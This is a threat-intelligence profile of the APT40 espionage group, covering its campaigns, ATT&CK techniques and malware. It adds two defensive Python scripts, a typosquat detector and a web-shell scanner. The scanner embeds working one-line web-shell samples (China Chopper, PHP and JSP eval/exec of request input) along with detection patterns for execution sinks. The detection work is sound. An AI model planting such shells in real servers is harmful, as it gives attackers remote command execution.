Overview
APT40 (also known by numerous aliases) is a Chinese state-sponsored Advanced Persistent Threat (APT) group operating out of Haikou, Hainan Province, China. Active since at least 2009, APT40 is linked to the Ministry of State Security (MSS) Hainan State Security Department (HSSD). Its operations focus on espionage and intellectual property theft, targeting a broad range of industries and organizations globally, including those in the United States, Canada, Europe, the Middle East, and the South China Sea region. The group uses a combination of custom and open-source malware, targeted social engineering, and rapid exploitation of newly published vulnerabilities in internet-facing systems to achieve its objectives. This profile covers tactics and techniques rather than ransomware incidents: APT40's goal is not financial gain through ransomware deployment, but the exfiltration of sensitive data for state purposes.
Known Aliases of APT40
APT40 is also known as BRONZE MOHAWK, FEVERDREAM, G0065, Gadolinium, GreenCrash, Hellsing, Kryptonite Panda, Leviathan, MUDCARP, Periscope, Temp.Periscope, and Temp.Jumper.
Country of Origin
People’s Republic of China (PRC). Specifically, the group is located in Haikou, Hainan Province.
Notable Victims/Most Recent Attacks Involving APT40
Cyberattacks on Samoa (Early 2025)
APT40 was formally blamed by the Samoan government for a wave of cyberattacks on national government systems and infrastructure. This was the first time a Pacific Island nation publicly attributed an attack to the Chinese state-backed actor, signaling the group’s expanding influence in the Pacific region.
Breach of U.S. Internet Providers – “Salt Typhoon” (September 2024)
Multiple U.S. internet service providers were breached through compromised Cisco routers and other network devices, in a campaign tracked as "Salt Typhoon." The breach raised serious concerns over Chinese access to sensitive network infrastructure. Note that Microsoft tracks Salt Typhoon as a distinct Chinese state actor from APT40 (which Microsoft names Gingham Typhoon), so public reporting does not firmly attribute these ISP intrusions to APT40 itself.
Exploitation of SOHO Routers (2024)
APT40 compromised unpatched and end-of-life Small Office/Home Office (SOHO) routers and used them as operational infrastructure, routing command-and-control traffic through them so that malicious connections blend in with legitimate residential and small-business traffic. This makes attribution and network-level blocking more difficult and gives the group a disposable last hop in front of its real infrastructure.
Cyberattack on New Zealand Parliament (2021, Publicly Attributed in 2024)
New Zealand attributed a 2021 breach of its Parliamentary Service and Parliamentary Counsel Office to APT40. While the exfiltrated data was not classified, the incident prompted heightened scrutiny of Chinese cyber activity in the region.
Targeting of Australian Networks (2023–2024)
APT40 targeted a range of Australian government and private sector entities by exploiting vulnerable and outdated internet-facing devices. Australia publicly condemned the activity, with support from the U.S., UK, and Japan.
Attacks on Defense Systems in Southeast Asia (June 2023)
The group was linked to targeted intrusions into Southeast Asian military and defense systems using spear-phishing campaigns and malware implants designed to extract classified defense intelligence.
Exploitation of Log4Shell Vulnerability (2021–2022)
APT40 was quick to exploit the critical Log4Shell vulnerability (CVE-2021-44228) after it became public, targeting enterprise systems running vulnerable Log4j versions to conduct espionage and establish persistent access to sensitive environments.
Common Methods of Infiltration Used by APT40
APT40 utilizes a variety of infiltration methods:
- Spearphishing: Targeted emails carrying malicious attachments or links.
- Exploitation of Public-Facing Applications: Unpatched or end-of-life internet-facing servers and edge devices, often compromised within days of a vulnerability being published.
- Drive-by Compromises: Luring targets to attacker-controlled or compromised websites that exploit the visiting browser.
- Exploiting Valid Accounts: Logging in with stolen credentials, including administrative accounts, rather than breaking in.
- Social Engineering: Manipulating individuals into revealing sensitive information or performing actions that compromise security.
APT40 MITRE ATT&CK Tactics and Techniques
APT40 exhibits a broad and sophisticated use of MITRE ATT&CK tactics across the full intrusion lifecycle, combining custom malware with open-source tools and living-off-the-land techniques to evade detection and maintain persistence.
1. Reconnaissance & Resource Development
APT40 performs extensive pre-attack research and infrastructure setup to support targeted intrusions:
- T1589 – Gather Victim Identity Information
- T1589.001 – Credentials: Collects credentials exposed in prior breaches and leaks to support later initial access.
- T1583 – Acquire Infrastructure
- T1583.001 – Domains: Registers attacker-controlled domains, often typosquats of the target or of a service it trusts, for C2 and phishing.
- T1585.002 – Establish Accounts (Email Accounts)
- T1586.002 – Compromise Accounts (Email Accounts)
2. Initial Access
APT40 uses a variety of techniques to gain initial entry into targeted environments:
- T1133 – External Remote Services
- Exploits remote services such as VPNs or RDP for unauthorized access.
- T1566 – Phishing
- T1566.001 – Spearphishing Attachment
- T1566.002 – Spearphishing Link
- T1189 – Drive-by Compromise
- T1190 – Exploit Public-Facing Application
- Targets unpatched internet-facing systems.
- T1078 – Valid Accounts
- Logs in with credentials stolen in third-party breaches or earlier campaigns. ATT&CK's sub-techniques under T1078 distinguish the account type (default, domain, local, cloud), not how the credential was obtained.
3. Execution
Once inside, APT40 runs malicious code using both custom scripts and native OS functionality:
- T1059 – Command and Scripting Interpreter
- T1059.001 – PowerShell: Used for payload execution, privilege escalation, and reconnaissance.
- T1203 – Exploitation for Client Execution
- Exploits vulnerabilities in client software (document readers, office suites, browsers) so that opening a lure file or page runs attacker code.
- T1204 – User Execution
- T1204.002 – Malicious File: Relies on social engineering to trick users into executing payloads.
4. Persistence, Privilege Escalation, Credential Access, Discovery, Lateral Movement
APT40 employs a combination of native tools, malware, and stolen credentials to maintain access and move laterally:
- Persistence & Privilege Escalation
- Uses valid accounts and malware implants with persistence mechanisms.
- Credential Access
- Extracts cached credentials and uses mimikatz-like tools.
- Discovery & Lateral Movement
- Executes internal reconnaissance and pivots using compromised credentials.
- T1534 – Internal Spearphishing
- Sends phishing emails from compromised internal accounts to spread laterally.
5. Defense Evasion
APT40 applies advanced evasion techniques to remain stealthy in target environments:
- T1027.003 – Obfuscated Files or Information (Steganography)
- T1001.003 – Data Obfuscation (Protocol or Service Impersonation)
- T1572 – Protocol Tunneling
- T1090.003 – Proxy (Multi-hop Proxy)
- Routes C2 traffic through multiple proxy layers, including compromised SOHO devices.
- Lookalike domains acquired under T1583.001 (Resource Development, above) double as an evasion measure, since C2 to a plausible-looking domain draws less scrutiny.
- S0183 – Tor
- C2 traffic occasionally routed through anonymizing services.
6. Command and Control (C2)
APT40 maintains robust and stealthy communications with infected hosts:
- Custom C2 Infrastructure
- Often established through typosquatted domains that impersonate legitimate services or brands.
- Encrypted Channels & Proxy Layers
- Uses protocol impersonation and tunneling to bypass network defenses.
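The typosquatted domains mentioned under Resource Development and here under C2 are something a defender can hunt for in resolver logs. The following is an added example of that detection logic, not tooling from the APT40 reporting or from any vendor: it folds common homoglyphs, then compares the registrable label of each queried name against a watchlist using exact, substring and one-edit (transposition-aware) matching. The watchlist, the suffix heuristic and the log lines are constructed for illustration.

```python
"""Flag DNS queries for lookalike domains of watched brands (added example; not APT40 tooling)."""
from typing import NamedTuple, Optional

# Constructed watchlist of registrable labels an organisation treats as its own or trusted
# (hypothetical; kept digit-free so homoglyph normalisation does not mangle them).
WATCHLIST = {"microsoft", "sharepoint", "okta", "examplecorp"}

# Multi-character substitutions first, so "rn" folds to "m" before "1" folds to "l".
HOMOGLYPHS = {"rn": "m", "vv": "w", "0": "o", "1": "l", "3": "e", "5": "s"}

# Heuristic two-part public suffixes; production code should use the Public Suffix List.
SECOND_LEVEL_SUFFIXES = {"co", "com", "org", "net", "gov", "ac", "edu"}

MIN_LEN_FOR_EDIT_MATCH = 6  # short brands such as "okta" are too noisy for edit-distance matching


class Finding(NamedTuple):
    ts: str
    client: str
    query: str
    brand: str
    reason: str


def normalize(label: str) -> str:
    """Fold common homoglyphs and hyphens so 'rnicros0ft-cdn' compares as 'microsoftcdn'."""
    s = label.lower()
    for bad, good in HOMOGLYPHS.items():
        s = s.replace(bad, good)
    return s.replace("-", "")


def osa_distance(a: str, b: str) -> int:
    """Optimal string alignment distance: Levenshtein plus an adjacent transposition as one edit."""
    d = [[0] * (len(b) + 1) for _ in range(len(a) + 1)]
    for i in range(len(a) + 1):
        d[i][0] = i
    for j in range(len(b) + 1):
        d[0][j] = j
    for i in range(1, len(a) + 1):
        for j in range(1, len(b) + 1):
            cost = 0 if a[i - 1] == b[j - 1] else 1
            d[i][j] = min(d[i - 1][j] + 1, d[i][j - 1] + 1, d[i - 1][j - 1] + cost)
            if i > 1 and j > 1 and a[i - 1] == b[j - 2] and a[i - 2] == b[j - 1]:
                d[i][j] = min(d[i][j], d[i - 2][j - 2] + 1)
    return d[len(a)][len(b)]


def registrable_label(fqdn: str) -> str:
    """Return the label just below the public suffix: 'update.micros0ft-cdn.net' -> 'micros0ft-cdn'."""
    parts = fqdn.rstrip(".").lower().split(".")
    if len(parts) < 2:
        return parts[0]
    if len(parts) >= 3 and parts[-2] in SECOND_LEVEL_SUFFIXES and len(parts[-1]) == 2:
        return parts[-3]
    return parts[-2]


def classify(fqdn: str) -> Optional[tuple]:
    """Return (brand, reason) when the domain looks like a typosquat of a watched brand, else None."""
    label = registrable_label(fqdn)
    if label in WATCHLIST:
        return None  # the genuine domain
    norm = normalize(label)
    for brand in sorted(WATCHLIST):
        if norm == brand:
            return brand, "homoglyph"          # rnicrosoft -> microsoft
        if brand in norm:
            return brand, "brand-embedding"    # sharepoint-examplecorp, micros0ft-cdn
        if len(brand) >= MIN_LEN_FOR_EDIT_MATCH and osa_distance(norm, brand) <= 1:
            return brand, "edit-distance"      # mircosoft (one transposition)
    return None


def scan(log_text: str) -> list:
    """Run classify() over 'ts client query' lines and return the suspicious ones in log order."""
    findings = []
    for line in log_text.splitlines():
        fields = line.split()
        if len(fields) != 3:
            continue
        ts, client, query = fields
        hit = classify(query)
        if hit:
            findings.append(Finding(ts, client, query, hit[0], hit[1]))
    return findings


# Constructed resolver log lines (not real telemetry).
SAMPLE_DNS_LOG = """\
2024-06-03T09:12:01Z 10.0.4.21 microsoft.com
2024-06-03T09:12:04Z 10.0.4.21 rnicrosoft.com
2024-06-03T09:13:10Z 10.0.7.8 sharepoint-examplecorp.com
2024-06-03T09:14:55Z 10.0.7.8 mircosoft.com
2024-06-03T09:15:02Z 10.0.2.2 update.micros0ft-cdn.net
2024-06-03T09:15:30Z 10.0.2.2 okta.com
2024-06-03T09:16:00Z 10.0.9.1 sharepoint.com
"""

if __name__ == "__main__":
    for f in scan(SAMPLE_DNS_LOG):
        print(f"{f.ts} {f.client} {f.query} -> lookalike of {f.brand} ({f.reason})")
```

Three of the seven sample queries are the genuine brands and are passed through; the other four are flagged with the rule that caught them. The edit-distance rule is deliberately restricted to longer brand names, since a one-edit match against a four-letter label would fire on ordinary traffic; in practice the watchlist should also be compared against newly observed domains only, not every query.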
7. Collection
Data collection and staging is handled systematically to support exfiltration:
- T1560 – Archive Collected Data
- Compresses and encrypts staged data before exfiltration, which also conceals its contents in transit (the former "Data Encrypted" technique, T1022, is now folded into T1560).
- T1074.001 – Local Data Staging
- T1074.002 – Remote Data Staging
8. Exfiltration
APT40 employs multiple methods to extract data covertly:
- T1041 – Exfiltration Over Command and Control Channel
- Data is exfiltrated over encrypted or disguised channels to avoid detection.
Malware Strains Used by APT40
APT40 draws on a large library of custom and open-source malware, much of which is shared with other suspected Chinese groups. Families publicly associated with the group include:
- BADFLICK/Greencrash
- China Chopper
- Cobalt Strike
- Derusbi/PHOTO
- Gh0stRAT
- GreenRAT
- jjdoor/Transporter
- jumpkick
- Murkytop (mt.exe)
- NanHaiShu
- Orz/AirBreak
- PowerShell Empire
- PowerSploit
There is also extensive use of web shells (T1505.003 – Server Software Component: Web Shell), which give the group persistent command execution on compromised internet-facing servers after the initial exploit.
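Because web shells such as China Chopper are tiny scripts that hand a request parameter straight to an execution sink, they can be hunted on disk with a source-to-sink heuristic rather than file hashes. The following scanner is an added example and not code from the APT40 reporting or from any product: it flags script files where request input and an execution sink co-occur, recovers sink names hidden behind base64_decode() literals, and recognises the widely published China Chopper ASPX stub. The file paths and contents are constructed for illustration (the Chopper sample is the public one-line server stub with an arbitrary parameter name).

```python
"""Scan web-root script files for web-shell indicators (added example; not from the APT40 reporting)."""
import base64
import re
from typing import Dict, List, NamedTuple, Optional

# Untrusted-input sources in ASP.NET, PHP and JSP.
SOURCE_RE = re.compile(
    r"Request\.(Item|Form|QueryString)\s*\[|Request\s*\[|\$_(POST|GET|REQUEST|COOKIE)\s*\[|request\.getParameter\s*\("
)
# Code- or command-execution sinks.
SINK_NAMES = {"eval", "assert", "system", "passthru", "shell_exec", "exec", "popen", "proc_open", "create_function"}
SINK_RE = re.compile(r"\b(" + "|".join(sorted(SINK_NAMES)) + r")\s*\(|Runtime\.getRuntime\(\)\.exec|ProcessBuilder\s*\(")
# The widely published China Chopper ASPX server stub: eval of a request parameter in "unsafe" mode.
CHOPPER_RE = re.compile(r'eval\s*\(\s*Request\.Item\s*\[\s*"[^"]+"\s*\]\s*,\s*"unsafe"\s*\)')
# String literals passed to base64_decode(), so an encoded sink name can be recovered.
B64_LITERAL_RE = re.compile(r"base64_decode\s*\(\s*['\"]([A-Za-z0-9+/=]{4,})['\"]\s*\)")
TINY_FILE_BYTES = 200  # one-line shells are far smaller than legitimate pages
SCRIPT_EXTENSIONS = {"php", "asp", "aspx", "ashx", "jsp", "jspx"}


class Finding(NamedTuple):
    path: str
    severity: str
    reasons: List[str]


def decoded_literals(content: str) -> List[str]:
    """Decode base64 literals handed to base64_decode(); skip ones that are not valid base64/UTF-8."""
    out = []
    for lit in B64_LITERAL_RE.findall(content):
        try:
            out.append(base64.b64decode(lit, validate=True).decode("utf-8"))
        except (ValueError, UnicodeDecodeError):
            continue
    return out


def inspect_file(path: str, content: str) -> Optional[Finding]:
    """Flag a file when request input and an execution sink co-occur; return None otherwise."""
    reasons = []
    has_source = SOURCE_RE.search(content) is not None
    sink = SINK_RE.search(content)
    if sink:
        reasons.append("execution sink: " + sink.group(0).strip())
    for text in decoded_literals(content):
        if text.strip() in SINK_NAMES:
            reasons.append("base64-encoded sink name: " + text.strip())
    if not (has_source and reasons):
        return None  # input without execution, or execution without input, is not the shell pattern
    reasons.insert(0, "request input reaches execution sink")
    severity = "medium"
    if CHOPPER_RE.search(content):
        reasons.append("china-chopper-signature")
        severity = "high"
    if len(content.encode("utf-8")) < TINY_FILE_BYTES:
        reasons.append(f"tiny script (<{TINY_FILE_BYTES} bytes)")
        severity = "high"
    return Finding(path, severity, reasons)


def scan_tree(files: Dict[str, str]) -> List[Finding]:
    """Inspect every script file in a path->content mapping and return findings sorted by path."""
    found = []
    for path in sorted(files):
        if path.rsplit(".", 1)[-1].lower() in SCRIPT_EXTENSIONS:
            finding = inspect_file(path, files[path])
            if finding:
                found.append(finding)
    return found


# Constructed file contents standing in for a crawled web root (hypothetical paths).
SAMPLE_FILES = {
    "wwwroot/aspnet_client/system_web/s.aspx":
        '<%@ Page Language="Jscript"%><%eval(Request.Item["pass"],"unsafe");%>',
    "htdocs/images/.cache.php": "<?php @eval($_POST['cmd']); ?>",
    "htdocs/uploads/t.php": "<?php $f = base64_decode('ZXZhbA=='); $f($_REQUEST['x']); ?>",
    "webapps/ROOT/tools/h.jsp": '<% Runtime.getRuntime().exec(request.getParameter("c")); %>',
    "htdocs/index.php": "<?php require 'vendor/autoload.php'; echo render_page($_GET['page'] ?? 'home'); ?>",
    "htdocs/admin/util.php": "<?php function safe_echo($s) { echo htmlspecialchars($s, ENT_QUOTES, 'UTF-8'); } ?>",
}

if __name__ == "__main__":
    for f in scan_tree(SAMPLE_FILES):
        print(f"[{f.severity}] {f.path}: " + "; ".join(f.reasons))
```

Of the six constructed files, the four shells are reported and the two legitimate pages are not: index.php reads request input but never passes it to an execution sink, and util.php has no request input at all. The base64 step matters because `$f = base64_decode('ZXZhbA=='); $f(...)` never contains the string `eval(`, so a plain grep for sink names misses it. Pair this with file-integrity baselines of the web root, since a source-to-sink heuristic will not catch shells that reach the sink through more layers of indirection.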